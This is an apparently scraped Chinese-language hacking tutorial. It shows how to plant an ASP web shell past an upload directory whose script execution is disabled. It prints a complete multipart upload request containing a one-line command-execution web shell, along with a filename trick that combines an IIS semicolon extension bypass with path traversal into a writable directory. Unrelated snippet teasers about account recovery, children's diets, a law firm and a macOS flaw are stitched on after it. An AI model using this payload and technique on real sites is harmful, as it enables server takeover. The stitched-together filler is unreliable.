然而。上传目录取消了脚本执行的权限。 我想这里估计大家都要放弃了。
如何突破呢?其实是可以的. 关键是 [不修改名字]
先来看看一个上传的数据包:
POST /fa-bu/upload/upfile1.asp HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, */*
Referer: http://xxxxx/fa-bu/upload/upload.asp
Accept-Language: zh-cn
Content-Type: multipart/form-data; boundary=---------------------------7da290150c5e
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
Host: xxx.xxxx.xxnet
Content-Length: 448
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: ASPSESSIONIDSSCTCSCT=DJBKGKLBBIGNKJMBGOENNPAN
-----------------------------7da290150c5e
Content-Disposition: form-data; name=act
upload
-----------------------------7da290150c5e
Content-Disposition: form-data; name=file1; filename=E:\xxx\xxx\xx\111.asp;.gif
Content-Type: text/plain
<%execute(request(cmd))%>
-----------------------------7da290150c5e
Content-Disposition: form-data; name=Submit
up
-----------------------------7da290150c5e--
关键是 :
Content-Disposition: form-data; name=file1; filename=E:\xxx\xxx\xx\111.asp;.gif
我首先呢。 filename他是如何判断 那个开始就是文件名呢? 他是判断filename里的最右边的一个\以后的就是文件名字了。
大家因该知道。 在windows下 \ 和 / 是不分家的。
假设上传之后的目录为upload/
然后一个可以执行可以写的目录为 okokok/
那么我们只要构造
Content-Disposition: form-data; name=file1; filename=E:\xxx\xxx\xx\./../okokok/111.asp;.gif
那么我们上传的文件就成功的传进去了 okokok/111.asp;.gif了。
打开抖音,点一下我,右上方三横标志,设定,意见反馈与协助,账号找回,挑选要换绑的账户,进行拼图图片认证,挑选递交认证材料找到,填好常见地址和常见型号,进行后,挑选最少一项曾关联的方式 开展认证,再填好...
本文导读目录: 1、通常说的“网络黑客”具体是什么概念? 2、什么是黑客攻击?为什么要攻击?怎么攻击的? 3、黑客侵入其他电脑设置的 伪装路径是怎么回事情? 4、什么是木马和黑客 5、...
吃蔬菜对于人体的好处是非常多的,也富含人体丰富的营养物质。但对孩子来说一般都不爱吃蔬菜,常常让家长很无奈。那么孩子不爱吃蔬菜该怎么办呢。下面小编就来和大家说一说。 孩子不爱吃蔬菜怎么做? 1.带孩...
是父子 我看了岳成的百科,他有两儿两女,都是名牌大学状师专业结业的,岳屾山应该是他儿子,别的,他照旧岳成状师事务所的高级合资人之一,就说明他在岳成身份非。 三山五岳 岳成律所宋静状师吧,儿...
一个软件工程师在其个人推特发文,团队发现MacOS High Sierra系统存在安全漏洞,可让未授权用户无需密码就可以拥有控制管理权。 据该工程师表示,未授权用户只需在用户登录界面的用户名一栏...
<%@ Import Namespace="DataServices" %><%@ Import Namespace="System.Data" %><%@ Import...